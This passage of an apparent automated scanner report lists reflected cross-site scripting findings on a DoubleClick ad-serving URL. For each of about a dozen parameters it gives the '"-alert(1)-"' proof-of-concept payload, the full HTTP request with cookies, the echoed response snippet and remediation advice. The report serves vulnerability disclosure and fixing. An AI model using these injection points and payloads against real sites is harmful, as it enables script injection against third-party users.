GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=f6d9c"-alert(1)-"5626e508392 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=f6d9c"-alert(1)-"5626e508392http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var d ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a44f"-alert(1)-"16be16c856c was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn9a44f"-alert(1)-"16be16c856c&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn9a44f"-alert(1)-"16be16c856c&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27 ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35431"-alert(1)-"9cd71fd2ba9 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=35431"-alert(1)-"9cd71fd2ba9&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 44525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=35431"-alert(1)-"9cd71fd2ba9&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34& ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83318"-alert(1)-"9a419acb350 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=183318"-alert(1)-"9a419acb350&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=183318"-alert(1)-"9a419acb350&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www. ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 613dc"-alert(1)-"d7cb0fb0487 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A613dc"-alert(1)-"d7cb0fb0487&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 45/%2a/j%3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A613dc"-alert(1)-"d7cb0fb0487&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011. ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e41"-alert(1)-"454b33c376a was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=27e41"-alert(1)-"454b33c376a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... bs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=27e41"-alert(1)-"454b33c376a&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177 ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3ed53"-alert(1)-"801fbb30cd5 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=3ed53"-alert(1)-"801fbb30cd5&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=3ed53"-alert(1)-"801fbb30cd5&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/vi ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec69"-alert(1)-"1b8e12f1a93 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=eec69"-alert(1)-"1b8e12f1a93&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3B240444525%3B0-0%3B0%3B63339400%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=eec69"-alert(1)-"1b8e12f1a93&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bc9e"-alert(1)-"18701bf19fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=4bc9e"-alert(1)-"18701bf19fd&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=4bc9e"-alert(1)-"18701bf19fd&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5aec1"-alert(1)-"4e981761ccd was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE5aec1"-alert(1)-"4e981761ccd&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE5aec1"-alert(1)-"4e981761ccd&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92bdb"-alert(1)-"9c5ea4cfe06 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=92bdb"-alert(1)-"9c5ea4cfe06&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0%3B4307-300/250%3B41893241/41911028/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511581%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=92bdb"-alert(1)-"9c5ea4cfe06&cid=&pp=100&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.games ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8622"-alert(1)-"e786040c9e9 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.3;sz=300x250;pc=cbs511581;click0=http://adlog.com.com/adlog/e/r=7108&sg=511581&o=1%253A23236%253A151%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100f8622"-alert(1)-"e786040c9e9&e=&rqid=01c13-ad-e6:4DB89CF8CB238&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
